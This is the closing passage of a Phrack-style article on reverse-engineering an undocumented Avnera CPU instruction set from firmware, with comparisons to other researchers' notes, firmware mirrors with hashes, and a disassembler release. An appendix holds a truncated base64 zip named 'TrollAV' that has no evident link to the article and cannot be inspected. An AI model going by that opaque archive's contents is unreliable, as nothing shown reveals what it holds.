instructions used to drive them.
this definitely applies when you do know the instruction set but are trying
to make sense of a larger program - it's just good advice when reverse
engineering a program. it's neat to see the idea carry through when you're
figuring out the instruction set itself.
additionally: this is doable! what's totally unknown at this point is mostly
instructions that don't appear in this program (at which point it's hard to
guess about behavior...)
--[ conclusion
that seems to be the ISA, at least as used in this program. this architecture
seems like an outsider art re-envisioning of the 8080, with fewer register
to register movs, and more indexed memory accesses. it seems interesting that
this architecture has loads like [r7:r6] and [r7:r6 + N] but not [r7:r6 + rN].
having non-offset load/store through a register pair seems a bit out of place
in its own right: it's a lot of encoding space to reserve for a relatively
rare operation. maybe it's more common in some reference program, and this
firmware is the odd one?
a0..af are almost nonexistent here, and may be other 8080-style instructions.
b0..b8 are not represented in this program, and would be prime encoding space
for conditional returns. it wouldn't be terribly shocking if a compiler
didn't know to use conditional returns and instead conditionally branched
over returns.
the moment i, at least, have been waiting for, after describing as much of
the ISA as possible, is to compare notes with others who have looked at this
CPU or programs for it:
* whitequark's binja plugin: https://github.com/whitequark/binja-avnera
* several years ago: https://github.com/Prehistoricman/AV7300
... we almost entirely agree! it seems that Prehistoricman tested with a
physical CPU, and has some notes for opcodes that are otherwise not present:
https://github.com/Prehistoricman/AV7300/blob/master
/Instruction%20set%20notes.txt#L195-L198
whitequark records 58..5f and 68..6f as set and clr respectively, which i
suspect are the same as i'd understood: set (or clear) a bit in the status
register. this is also what Prehistoricman understood them to mean.
i'm pretty surprised how much can be reasonably guessed out from just a 12kb
firmware! there are plenty of operational semantics missing in my descriptions
above - for example, i know basically nothing about memory addressing: lots of
the above leaned on assuming a flat 64kb address space is a decent
approximation.
segmentation would be annoying to figure out! if the ISA were anything more
complex it probably would have required more than just staring really hard at
notes. an ARM-style encoding with more aggressive packing of bits certainly
would have been harder to discover.
if you happen to want to disassemble programs for Avnera processors - it's
not at all clear to me which models may have different or extended instruction
sets - i've published a disassembler based on the above notes as
yaxpeax-avnera. from whitequark's note here it does seem likely this
instruction set is common across many models!
--[ summarized materials
[1]: https://www.robertxiao.ca/hacking
/dsctf-2019-cpu-adventure-unknown-cpu-reversing/
there are a few more programs reportedly for this architecture here, from
Prehistoricman at https://github.com/Prehistoricman/AV7300. mirrored below:
* https://www.iximeow.net/hof/av7300/base_station_dump.bin
- sha256: fe25e7beae845ad68c0003a59c8d1b73d3202521f5d5221fdaf43eb3ebf1babf
* https://www.iximeow.net/hof/av7300/headset_dump.bin
- sha256: 782f3ab95a59ceddfe6d3d475c5c0a31b2d05e1baf2201c1f2f14743e9faa731
the program i reference heavily in this post is mirrored here:
* https://www.iximeow.net/hof/av7200/noes
- sha256: 0f433076bd00381a99c6dd5aabf55653317b4519c2860e944b6090b2f4aa5a9e
whitequark's excellent cheatsheet of the encoding space:
* https://github.com/whitequark/binja-avnera/tree
/main?tab=readme-ov-file#cheatsheet
and finally, yaxpeax-avnera, the librarified form of the disassembler i built
up in parallel with the above research:
https://www.github.com/iximeow/yaxpeax-avnera
|=-----------------------------------------------------------------------=|
|=-=[ Appendix: File Attachments ]=--------------------------------------=|
|=-----------------------------------------------------------------------=|
<++> TrollAV.zip.uu
begin-base64 777 TrollAV.zip.uu
UEsDBBQAAAAAAGuvBVkAAAAAAAAAAAAAAAAIAAAAVHJvbGxBVi9QSwMEFAAA
AAgAaq8FWYJXCh4BBAAA7QYAABEAAABUcm9sbEFWL1JFQURNRS5tZI1Vy3LT
...
AFBLAQI/ABQAAAAIAGuvBVnKHHAQgQkAAM4jAAASACQAAAAAAAAAIAAAANUV
AABUcm9sbEFWL3Y0X2lzYXBpLmMKACAAAAAAAAEAGACnHK1lvefaAQAAAAAA
AAAAAAAAAAAAAABQSwUGAAAAAAcABwCfAgAAhh8AAAAA
====
<-->
|=[ EOF ]=---------------------------------------------------------------=|
